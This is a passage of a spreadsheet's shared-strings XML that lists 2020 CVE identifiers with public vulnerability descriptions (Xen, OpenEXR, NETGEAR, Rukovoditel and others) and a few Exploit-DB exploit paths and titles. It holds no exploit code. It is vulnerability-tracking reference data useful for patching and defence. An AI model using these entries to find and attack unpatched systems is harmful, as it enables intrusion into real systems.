    <t>An issue was discovered in DAViCal Andrew's Web Libraries (AWL) through 0.60. Session management does not use a sufficiently hard-to-guess session key. Anyone who can guess the microsecond time (and the incrementing session_id) can impersonate a session.</t>
  </si>
  <si>
    <t>CVE-2020-11729</t>
  </si>
  <si>
    <t>An issue was discovered in DAViCal Andrew's Web Libraries (AWL) through 0.60. Long-term session cookies, uses to provide long-term session continuity, are not generated securely, enabling a brute-force attack that may be successful.</t>
  </si>
  <si>
    <t>CVE-2020-1173</t>
  </si>
  <si>
    <t>A spoofing vulnerability exists in Microsoft Power BI Report Server in the way it validates the content-type of uploaded attachments, aka 'Microsoft Power BI Report Server Spoofing Vulnerability'.</t>
  </si>
  <si>
    <t>exploits/php/webapps/50420.py</t>
  </si>
  <si>
    <t>Wordpress Plugin Duplicator 1.3.26 - Unauthenticated Arbitrary File Read</t>
  </si>
  <si>
    <t>CVE-2020-11731</t>
  </si>
  <si>
    <t>The Media Library Assistant plugin before 2.82 for Wordpress suffers from multiple XSS vulnerabilities in all Settings/Media Library Assistant tabs, which allow remote authenticated users to execute arbitrary JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-11732</t>
  </si>
  <si>
    <t>The Media Library Assistant plugin before 2.82 for Wordpress suffers from a Local File Inclusion vulnerability in mla_gallery link=download.</t>
  </si>
  <si>
    <t>CVE-2020-11733</t>
  </si>
  <si>
    <t>An issue was discovered on Spirent TestCenter and Avalanche appliance admin interface firmware. An attacker, who already has access to an SSH restricted shell, can achieve root access via shell metacharacters. The attacker can then, for example, read sensitive files such as appliance admin configuration source code. This affects Spirent TestCenter and Avalanche products which chassis version &lt;= 5.08. The SSH restricted shell is available with default credentials.</t>
  </si>
  <si>
    <t>CVE-2020-11734</t>
  </si>
  <si>
    <t>cgi-bin/go in CyberSolutions CyberMail 5 or later allows XSS via the ACTION parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11735</t>
  </si>
  <si>
    <t>The private-key operations in ecc.c in wolfSSL before 4.4.0 do not use a constant-time modular inverse when mapping to affine coordinates, aka a "projective coordinates leak."</t>
  </si>
  <si>
    <t>CVE-2020-11736</t>
  </si>
  <si>
    <t>fr-archive-libarchive.c in GNOME file-roller through 3.36.1 allows Directory Traversal during extraction because it lacks a check of whether a file's parent is a symlink to a directory outside of the intended extraction location.</t>
  </si>
  <si>
    <t>CVE-2020-11737</t>
  </si>
  <si>
    <t>A cross-site scripting (XSS) vulnerability in Web Client in Zimbra 9.0 allows a remote attacker to craft links in an E-Mail message or calendar invite to execute arbitrary JavaScript. The attack requires an A element containing an href attribute with a "www" substring (including the quotes) followed immediately by a DOM event listener such as onmouseover. This is fixed in 9.0.0 Patch 2.</t>
  </si>
  <si>
    <t>CVE-2020-11738</t>
  </si>
  <si>
    <t>The Snap Creek Duplicator plugin before 1.3.28 for WordPress (and Duplicator Pro before 3.8.7.1) allows Directory Traversal via ../ in the file parameter to duplicator_download or duplicator_init.</t>
  </si>
  <si>
    <t>CVE-2020-11739</t>
  </si>
  <si>
    <t>An issue was discovered in Xen through 4.13.x, allowing guest OS users to cause a denial of service or possibly gain privileges because of missing memory barriers in read-write unlock paths. The read-write unlock paths don't contain a memory barrier. On Arm, this means a processor is allowed to re-order the memory access with the preceding ones. In other words, the unlock may be seen by another processor before all the memory accesses within the "critical" section. As a consequence, it may be possible to have a writer executing a critical section at the same time as readers or another writer. In other words, many of the assumptions (e.g., a variable cannot be modified after a check) in the critical sections are not safe anymore. The read-write locks are used in hypercalls (such as grant-table ones), so a malicious guest could exploit the race. For instance, there is a small window where Xen can leak memory if XENMAPSPACE_grant_table is used concurrently. A malicious guest may be able to leak memory, or cause a hypervisor crash resulting in a Denial of Service (DoS). Information leak and privilege escalation cannot be excluded.</t>
  </si>
  <si>
    <t>CVE-2020-1174</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1051, CVE-2020-1175, CVE-2020-1176.</t>
  </si>
  <si>
    <t>exploits/php/webapps/48707.txt</t>
  </si>
  <si>
    <t>PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting</t>
  </si>
  <si>
    <t>CVE-2020-11740</t>
  </si>
  <si>
    <t>An issue was discovered in xenoprof in Xen through 4.13.x, allowing guest OS users (without active profiling) to obtain sensitive information about other guests. Unprivileged guests can request to map xenoprof buffers, even if profiling has not been enabled for those guests. These buffers were not scrubbed.</t>
  </si>
  <si>
    <t>CVE-2020-11741</t>
  </si>
  <si>
    <t>An issue was discovered in xenoprof in Xen through 4.13.x, allowing guest OS users (with active profiling) to obtain sensitive information about other guests, cause a denial of service, or possibly gain privileges. For guests for which "active" profiling was enabled by the administrator, the xenoprof code uses the standard Xen shared ring structure. Unfortunately, this code did not treat the guest as a potential adversary: it trusts the guest not to modify buffer size information or modify head / tail pointers in unexpected ways. This can crash the host (DoS). Privilege escalation cannot be ruled out.</t>
  </si>
  <si>
    <t>CVE-2020-11742</t>
  </si>
  <si>
    <t>An issue was discovered in Xen through 4.13.x, allowing guest OS users to cause a denial of service because of bad continuation handling in GNTTABOP_copy. Grant table operations are expected to return 0 for success, and a negative number for errors. The fix for CVE-2017-12135 introduced a path through grant copy handling where success may be returned to the caller without any action taken. In particular, the status fields of individual operations are left uninitialised, and may result in errant behaviour in the caller of GNTTABOP_copy. A buggy or malicious guest can construct its grant table in such a way that, when a backend domain tries to copy a grant, it hits the incorrect exit path. This returns success to the caller without doing anything, which may cause crashes or other incorrect behaviour.</t>
  </si>
  <si>
    <t>CVE-2020-11743</t>
  </si>
  <si>
    <t>An issue was discovered in Xen through 4.13.x, allowing guest OS users to cause a denial of service because of a bad error path in GNTTABOP_map_grant. Grant table operations are expected to return 0 for success, and a negative number for errors. Some misplaced brackets cause one error path to return 1 instead of a negative value. The grant table code in Linux treats this condition as success, and proceeds with incorrectly initialised state. A buggy or malicious guest can construct its grant table in such a way that, when a backend domain tries to map a grant, it hits the incorrect error path. This will crash a Linux based dom0 or backend domain.</t>
  </si>
  <si>
    <t>CVE-2020-11749</t>
  </si>
  <si>
    <t>Pandora FMS 7.0 NG &lt;= 746 suffers from Multiple XSS vulnerabilities in different browser views. A network administrator scanning a SNMP device can trigger a Cross Site Scripting (XSS), which can run arbitrary code to allow Remote Code Execution as root or apache2.</t>
  </si>
  <si>
    <t>CVE-2020-1175</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1051, CVE-2020-1174, CVE-2020-1176.</t>
  </si>
  <si>
    <t>CVE-2020-11753</t>
  </si>
  <si>
    <t>An issue was discovered in Sonatype Nexus Repository Manager in versions 3.21.1 and 3.22.0. It is possible for a user with appropriate privileges to create, modify, and execute scripting tasks without use of the UI or API. NOTE: in 3.22.0, scripting is disabled by default (making this not exploitable).</t>
  </si>
  <si>
    <t>CVE-2020-11758</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds read in ImfOptimizedPixelReading.h.</t>
  </si>
  <si>
    <t>CVE-2020-11759</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.4.1. Because of integer overflows in CompositeDeepScanLine::Data::handleDeepFrameBuffer and readSampleCountForLineBlock, an attacker can write to an out-of-bounds pointer.</t>
  </si>
  <si>
    <t>CVE-2020-1176</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka 'Jet Database Engine Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2020-1051, CVE-2020-1174, CVE-2020-1175.</t>
  </si>
  <si>
    <t>CVE-2020-11760</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds read during RLE uncompression in rleUncompress in ImfRle.cpp.</t>
  </si>
  <si>
    <t>CVE-2020-11761</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds read during Huffman uncompression, as demonstrated by FastHufDecoder::refill in ImfFastHuf.cpp.</t>
  </si>
  <si>
    <t>CVE-2020-11762</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds read and write in DwaCompressor::uncompress in ImfDwaCompressor.cpp when handling the UNKNOWN compression case.</t>
  </si>
  <si>
    <t>CVE-2020-11763</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.4.1. There is an std::vector out-of-bounds read and write, as demonstrated by ImfTileOffsets.cpp.</t>
  </si>
  <si>
    <t>CVE-2020-11764</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.4.1. There is an out-of-bounds write in copyIntoFrameBuffer in ImfMisc.cpp.</t>
  </si>
  <si>
    <t>CVE-2020-11765</t>
  </si>
  <si>
    <t>An issue was discovered in OpenEXR before 2.4.1. There is an off-by-one error in use of the ImfXdr.h read function by DwaCompressor::Classifier::Classifier, leading to an out-of-bounds read.</t>
  </si>
  <si>
    <t>CVE-2020-11766</t>
  </si>
  <si>
    <t>sendfax.php in iFAX AvantFAX before 3.3.6 and HylaFAX Enterprise Web Interface before 0.2.5 allows authenticated Command Injection.</t>
  </si>
  <si>
    <t>CVE-2020-11767</t>
  </si>
  <si>
    <t>Istio through 1.5.1 and Envoy through 1.14.1 have a data-leak issue. If there is a TCP connection (negotiated with SNI over HTTPS) to *.example.com, a request for a domain concurrently configured explicitly (e.g., abc.example.com) is sent to the server(s) listening behind *.example.com. The outcome should instead be 421 Misdirected Request. Imagine a shared caching forward proxy re-using an HTTP/2 connection for a large subnet with many users. If a victim is interacting with abc.example.com, and a server (for abc.example.com) recycles the TCP connection to the forward proxy, the victim's browser may suddenly start sending sensitive data to a *.example.com server. This occurs because the forward proxy between the victim and the origin server reuses connections (which obeys the specification), but neither Istio nor Envoy corrects this by sending a 421 error. Similarly, this behavior voids the security model browsers have put in place between domains.</t>
  </si>
  <si>
    <t>CVE-2020-11768</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by Stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK20 before 2.3.5.26, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK40 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBK50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-11769</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK20 before 2.3.5.26, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK40 before 2.3.5.30, RBK50 before 2.3.5.30, RBS50 before 2.3.5.30, RBK50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-1177</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1183, CVE-2020-1297, CVE-2020-1298, CVE-2020-1318, CVE-2020-1320.</t>
  </si>
  <si>
    <t>CVE-2020-11770</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an authenticated user. This affects D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, R6220 before 1.1.0.80, R6250 before 1.0.4.34, R6260 before 1.1.0.64, R6400 before 1.0.1.46, R6400v2 before 1.0.2.66, R6700 before 1.0.2.6, R6700v2 before 1.2.0.36, R6700v3 before 1.0.2.66, R6800 before 1.2.0.36, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R6900v2 before 1.2.0.36, R7000 before 1.0.9.42, R7000P before 1.3.1.64, R7100LG before 1.0.0.50, R7300DST before 1.0.0.70, R7800 before 1.0.2.60, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, R8900 before 1.0.4.12, R9000 before 1.0.4.12, and XR500 before 2.3.2.32.</t>
  </si>
  <si>
    <t>CVE-2020-11771</t>
  </si>
  <si>
    <t>CVE-2020-11772</t>
  </si>
  <si>
    <t>CVE-2020-11773</t>
  </si>
  <si>
    <t>CVE-2020-11774</t>
  </si>
  <si>
    <t>CVE-2020-11775</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBR20 before 2.3.5.26, RBS20 before 2.3.5.26, RBK20 before 2.3.5.26, RBR40 before 2.3.5.30, RBS40 before 2.3.5.30, RBK40 before 2.3.5.30, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBK50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-11776</t>
  </si>
  <si>
    <t>CVE-2020-11777</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by Stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-11778</t>
  </si>
  <si>
    <t>CVE-2020-11779</t>
  </si>
  <si>
    <t>CVE-2020-1178</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted authentication request to an affected SharePoint server, aka 'Microsoft SharePoint Server Elevation of Privilege Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11780</t>
  </si>
  <si>
    <t>CVE-2020-11781</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by stored XSS. This affects D7800 before 1.0.1.56, R7500v2 before 1.0.3.46, R7800 before 1.0.2.68, R8900 before 1.0.4.28, R9000 before 1.0.4.28, RAX120 before 1.0.0.78, RBR50 before 2.3.5.30, RBS50 before 2.3.5.30, RBK50 before 2.3.5.30, XR500 before 2.3.2.56, and XR700 before 1.0.1.10.</t>
  </si>
  <si>
    <t>CVE-2020-11782</t>
  </si>
  <si>
    <t>CVE-2020-11783</t>
  </si>
  <si>
    <t>CVE-2020-11784</t>
  </si>
  <si>
    <t>CVE-2020-11785</t>
  </si>
  <si>
    <t>CVE-2020-11786</t>
  </si>
  <si>
    <t>CVE-2020-11787</t>
  </si>
  <si>
    <t>CVE-2020-11788</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by authentication bypass. This affects D6200 before 1.1.00.34, D7000 before 1.0.1.68, PR2000 before 1.0.0.28, R6050 before 1.0.1.18, JR6150 before 1.0.1.18, R6120 before 1.0.0.46, R6220 before 1.1.0.80, R6230 before 1.1.0.80, R6260 before 1.1.0.64, R6700v2 before 1.2.0.36, R6800 before 1.2.0.36, and R6900v2 before 1.2.0.36.</t>
  </si>
  <si>
    <t>CVE-2020-11789</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker. This affects R6400v2 before 1.0.4.84, R6700 before 1.0.2.8, R6700v3 before 1.0.4.84, R6900 before 1.0.2.8, and R7900 before 1.0.3.10.</t>
  </si>
  <si>
    <t>CVE-2020-1179</t>
  </si>
  <si>
    <t>An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory, aka 'Windows GDI Information Disclosure Vulnerability'. This CVE ID is unique from CVE-2020-0963, CVE-2020-1141, CVE-2020-1145.</t>
  </si>
  <si>
    <t>CVE-2020-11790</t>
  </si>
  <si>
    <t>NETGEAR R7800 devices before 1.0.2.68 are affected by remote code execution by unauthenticated attackers.</t>
  </si>
  <si>
    <t>CVE-2020-11791</t>
  </si>
  <si>
    <t>NETGEAR JGS516PE devices before 2.6.0.43 are affected by reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2020-11792</t>
  </si>
  <si>
    <t>NETGEAR R8900, R9000, RAX120, and XR700 devices before 2020-01-20 are affected by Transport Layer Security (TLS) certificate private key disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-11793</t>
  </si>
  <si>
    <t>A use-after-free issue exists in WebKitGTK before 2.28.1 and WPE WebKit before 2.28.1 via crafted web content that allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash).</t>
  </si>
  <si>
    <t>CVE-2020-11795</t>
  </si>
  <si>
    <t>In JetBrains Space through 2020-04-22, the session timeout period was configured improperly.</t>
  </si>
  <si>
    <t>CVE-2020-11796</t>
  </si>
  <si>
    <t>In JetBrains Space through 2020-04-22, the password authentication implementation was insecure.</t>
  </si>
  <si>
    <t>CVE-2020-11797</t>
  </si>
  <si>
    <t>An Authentication Bypass vulnerability in the Published Area of the web conferencing component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an unauthenticated attacker to gain access to unauthorized information due to insufficient access validation. A successful exploit could allow an attacker to access sensitive shared files.</t>
  </si>
  <si>
    <t>CVE-2020-11798</t>
  </si>
  <si>
    <t>A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.</t>
  </si>
  <si>
    <t>CVE-2020-11799</t>
  </si>
  <si>
    <t>Z-Cron 5.6 Build 04 allows an unprivileged attacker to elevate privileges by modifying a privileged user's task. This can also affect all users who are signed in on the system if a shell is placed in a location that other unprivileged users have access to.</t>
  </si>
  <si>
    <t>CVE-2020-1180</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2020-1057, CVE-2020-1172.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/48817.py</t>
  </si>
  <si>
    <t>SpamTitan 7.07 - Remote Code Execution (Authenticated)</t>
  </si>
  <si>
    <t>CVE-2020-11800</t>
  </si>
  <si>
    <t>Zabbix Server 2.2.x and 3.0.x before 3.0.31, and 3.2 allows remote attackers to execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2020-11803</t>
  </si>
  <si>
    <t>An issue was discovered in Titan SpamTitan 7.07. Improper sanitization of the parameter jaction when interacting with the page mailqueue.php could lead to PHP code evaluation server-side, because the user-provided input is passed directly to the php eval() function. The user has to be authenticated on the web platform before interacting with the page.</t>
  </si>
  <si>
    <t>CVE-2020-11804</t>
  </si>
  <si>
    <t>An issue was discovered in Titan SpamTitan 7.07. Due to improper sanitization of the parameter quid, used in the page mailqueue.php, code injection can occur. The input for this parameter is provided directly by an authenticated user via an HTTP GET request.</t>
  </si>
  <si>
    <t>CVE-2020-11805</t>
  </si>
  <si>
    <t>Pexip Reverse Proxy and TURN Server before 6.1.0 has Incorrect UDP Access Control via TURN.</t>
  </si>
  <si>
    <t>CVE-2020-11806</t>
  </si>
  <si>
    <t>In MailStore Outlook Add-in (and Email Archive Outlook Add-in) through 12.1.2, the login process does not validate the validity of the certificate presented by the server.</t>
  </si>
  <si>
    <t>CVE-2020-11807</t>
  </si>
  <si>
    <t>Because of Unrestricted Upload of a File with a Dangerous Type, Sourcefabric Newscoop 4.4.7 allows an authenticated user to execute arbitrary PHP code (and sometimes terminal commands) on a server by making an avatar update and then visiting the avatar file under the /images/ path.</t>
  </si>
  <si>
    <t>CVE-2020-1181</t>
  </si>
  <si>
    <t>exploits/php/webapps/48784.py</t>
  </si>
  <si>
    <t>Rukovoditel 2.7.1 - Remote Code Execution (2) (Authenticated)</t>
  </si>
  <si>
    <t>2020-09-02</t>
  </si>
  <si>
    <t>CVE-2020-11810</t>
  </si>
  <si>
    <t>An issue was discovered in OpenVPN 2.4.x before 2.4.9. An attacker can inject a data channel v2 (P_DATA_V2) packet using a victim's peer-id. Normally such packets are dropped, but if this packet arrives before the data channel crypto parameters have been initialized, the victim's connection will be dropped. This requires careful timing due to the small time window (usually within a few seconds) between the victim client connection starting and the server PUSH_REPLY response back to the client. This attack will only work if Negotiable Cipher Parameters (NCP) is in use.</t>
  </si>
  <si>
    <t>CVE-2020-11811</t>
  </si>
  <si>
    <t>In qdPM 9.1, an attacker can upload a malicious .php file to the server by exploiting the Add Profile Photo capability with a crafted content-type value. After that, the attacker can execute an arbitrary command on the server using this malicious file.</t>
  </si>
  <si>
    <t>CVE-2020-11812</t>
  </si>
  <si>
    <t>Rukovoditel 2.5.2 is affected by a SQL injection vulnerability because of improper handling of the filters[0][value] or filters[1][value] parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11813</t>
  </si>
  <si>
    <t>In Rukovoditel 2.5.2, there is a stored XSS vulnerability on the configuration page via the copyright text input. Thus, an attacker can inject a malicious script to steal all users' valuable data. This copyright text is on every page so this attack vector can be very dangerous.</t>
  </si>
  <si>
    <t>CVE-2020-11814</t>
  </si>
  <si>
    <t>A Host Header Injection vulnerability in qdPM 9.1 may allow an attacker to spoof a particular header and redirect users to malicious websites.</t>
  </si>
  <si>
    <t>CVE-2020-11815</t>
  </si>
  <si>
    <t>In Rukovoditel 2.5.2, attackers can upload arbitrary file to the server by just changing the content-type value. As a result of that, an attacker can execute a command on the server. This specific attack only occurs without the Maintenance Mode setting.</t>
  </si>
  <si>
    <t>CVE-2020-11816</t>
  </si>
  <si>
    <t>Rukovoditel 2.5.2 is affected by a SQL injection vulnerability because of improper handling of the reports_id (POST) parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11817</t>
  </si>
  <si>
    <t>In Rukovoditel V2.5.2, attackers can upload an arbitrary file to the server just changing the the content-type value. As a result of that, an attacker can execute a command on the server. This specific attack only occurs with the Maintenance Mode setting.</t>
  </si>
  <si>
    <t>CVE-2020-11818</t>
  </si>
  <si>
    <t>In Rukovoditel 2.5.2 has a form_session_token value to prevent CSRF attacks. This protection mechanism can be bypassed with another user's valid token. Thus, an attacker can change the Admin password by using a CSRF attack and escalate his/her privileges.</t>
  </si>
  <si>
    <t>CVE-2020-11819</t>
  </si>
  <si>
    <t>In Rukovoditel 2.5.2, an attacker may inject an arbitrary .php file location instead of a language file and thus achieve command execution.</t>
  </si>
  <si>
    <t>CVE-2020-1182</t>
  </si>
  <si>
    <t>A remote code execution vulnerability exists in Microsoft Dynamics 365 for Finance and Operations (on-premises) version 10.0.11, aka 'Microsoft Dynamics 365 for Finance and Operations (on-premises) Remote Code Execution Vulnerability'.</t>
  </si>
  <si>
    <t>CVE-2020-11820</t>
  </si>
  <si>
    <t>Rukovoditel 2.5.2 is affected by a SQL injection vulnerability because of improper handling of the entities_id parameter.</t>
  </si>
  <si>
    <t>CVE-2020-11821</t>
  </si>
  <si>
    <t>In Rukovoditel 2.5.2, users' passwords and usernames are stored in a cookie with URL encoding, base64 encoding, and hashing. Thus, an attacker can easily apply brute force on them.</t>
  </si>
  <si>
    <t>CVE-2020-11822</t>
  </si>
  <si>
    <t>In Rukovoditel 2.5.2, there is a stored XSS vulnerability on the application structure --&gt; user access groups page. Thus, an attacker can inject malicious script to steal all users' valuable data.</t>
  </si>
  <si>
    <t>CVE-2020-11823</t>
  </si>
  <si>
    <t>In Dolibarr 10.0.6, if USER_LOGIN_FAILED is active, there is a stored XSS vulnerability on the admin tools --&gt; audit page. This may lead to stealing of the admin account.</t>
  </si>
  <si>
    <t>CVE-2020-11825</t>
  </si>
  <si>
    <t>In Dolibarr 10.0.6, forms are protected with a CSRF token against CSRF attacks. The problem is any CSRF token in any user's session can be used in another user's session. CSRF tokens should not be valid in this situation.</t>
  </si>
  <si>
    <t>CVE-2020-11826</t>
  </si>
  <si>
    <t>Users can lock their notes with a password in Memono version 3.8. Thus, users needs to know a password to read notes. However, these notes are stored in a database without encryption and an attacker can read the password-protected notes without having the password. Notes are stored in the ZENTITY table in the memono.sqlite database.</t>
  </si>
  <si>
    <t>CVE-2020-11827</t>
  </si>
  <si>
    <t>In GOG Galaxy 1.2.67, there is a service that is vulnerable to weak file/service permissions: GalaxyClientService.exe. An attacker can put malicious code in a Trojan horse GalaxyClientService.exe. After that, the attacker can re-start this service as an unprivileged user to escalate his/her privileges and run commands on the machine with SYSTEM rights.</t>
  </si>
  <si>
    <t>CVE-2020-11828</t>
  </si>
  <si>
    <t>In ColorOS (oppo mobile phone operating system, based on AOSP frameworks/native code position/services/surfaceflinger surfaceflinger.CPP), RGB is defined on the stack but uninitialized, so when the screenShot function to RGB value assignment, will not initialize the value is returned to the attackers, leading to values on the stack information leakage, the vulnerability can be used to bypass attackers ALSR.</t>
  </si>
  <si>
    <t>CVE-2020-11829</t>
  </si>
  <si>
    <t>Dynamic loading of services in the backup and restore SDK leads to elevated privileges, affected product is com.coloros.codebook V2.0.0_5493e40_200722.</t>
  </si>
  <si>
    <t>CVE-2020-1183</t>
  </si>
  <si>
    <t>A cross-site-scripting (XSS) vulnerability exists when Microsoft SharePoint Server does not properly sanitize a specially crafted web request to an affected SharePoint server, aka 'Microsoft Office SharePoint XSS Vulnerability'. This CVE ID is unique from CVE-2020-1177, CVE-2020-1297, CVE-2020-1298, CVE-2020-1318, CVE-2020-1320.</t>
  </si>
  <si>
    <t>CVE-2020-11830</t>
  </si>
  <si>
    <t>QualityProtect has a vulnerability to execute arbitrary system commands, affected product is com.oppo.qualityprotect V2.0.</t>
  </si>
  <si>
    <t>CVE-2020-11831</t>
  </si>
  <si>
    <t>OvoiceManager has system permission to write vulnerability reports for arbitrary files, affected product is com.oppo.ovoicemanager V2.0.1.</t>
  </si>
  <si>
    <t>CVE-2020-11832</t>
  </si>
  <si>
    <t>In functions charging_limit_current_write and charging_limit_time_write in /SM8250_Q_Master/android/vendor/oppo_charger/oppo/oppo_charger.c have not checked the parameters, which causes a vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-11833</t>
  </si>
  <si>
    <t>In /SM8250_Q_Master/android/vendor/oppo_charger/oppo/charger_ic/oppo_mp2650.c, the function mp2650_data_log_write in mp2650_data_log_write does not check the parameter len which causes a vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-11834</t>
  </si>
  <si>
    <t>In /SM8250_Q_Master/android/vendor/oppo_charger/oppo/oppo_vooc.c, the function proc_fastchg_fw_update_write in proc_fastchg_fw_update_write does not check the parameter len, resulting in a vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-11835</t>
  </si>
  <si>
    <t>In /SM8250_Q_Master/android/vendor/oppo_charger/oppo/charger_ic/oppo_da9313.c, failure to check the parameter buf in the function proc_work_mode_write in proc_work_mode_write causes a vulnerability.</t>
  </si>
  <si>
    <t>CVE-2020-11836</t>
  </si>
  <si>
    <t>OPPO Android Phone with MTK chipset and Android 8.1/9/10/11 versions have an information leak vulnerability. The “adb shell getprop ro.vendor.aee.enforcing” or “adb shell getprop ro.vendor.aee.enforcing” return no.</t>
  </si>
  <si>
    <t>CVE-2020-11838</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Micro Focus ArcSight Management Center product, Affecting versions 2.6.1, 2.7.x, 2.8.x, 2.9.x prior to 2.9.4. The vulnerabilities could be remotely exploited resulting in Cross-Site Scripting (XSS) or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-11839</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in Micro Focus ArcSight Logger product, affecting all version from 6.6.1 up to version 7.0.1. The vulnerabilities could be remotely exploited resulting in Cross-Site Scripting (XSS) or information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-1184</t>
  </si>
  <si>
    <t>An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory, aka 'Windows State Repository Service Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1124, CVE-2020-1131, CVE-2020-1134, CVE-2020-1144, CVE-2020-1185, CVE-2020-1186, CVE-2020-1187, CVE-2020-1188, CVE-2020-1189, CVE-2020-1190, CVE-2020-1191.</t>
  </si>
  <si>
    <t>CVE-2020-11840</t>
  </si>
  <si>
    <t>Unauthorized information disclosure vulnerability in Micro Focus ArcSight Management Center product, Affecting versions 2.6.1, 2.7.x, 2.8.x, 2.9.x prior to 2.9.4. The vulnerabilities could be remotely exploited resulting unauthorized information disclosure.</t>
  </si>
  <si>
    <t>CVE-2020-11841</t>
  </si>
  <si>
    <t>CVE-2020-11842</t>
  </si>
  <si>
    <t>Information disclosure vulnerability in Micro Focus Verastream Host Integrator (VHI) product, affecting versions earlier than 7.8 Update 1 (7.8.49 or 7.8.0.49). The vulnerability allows an unauthenticated attackers to view information they may not have been authorized to view.</t>
  </si>
  <si>
    <t>CVE-2020-11844</t>
  </si>
  <si>
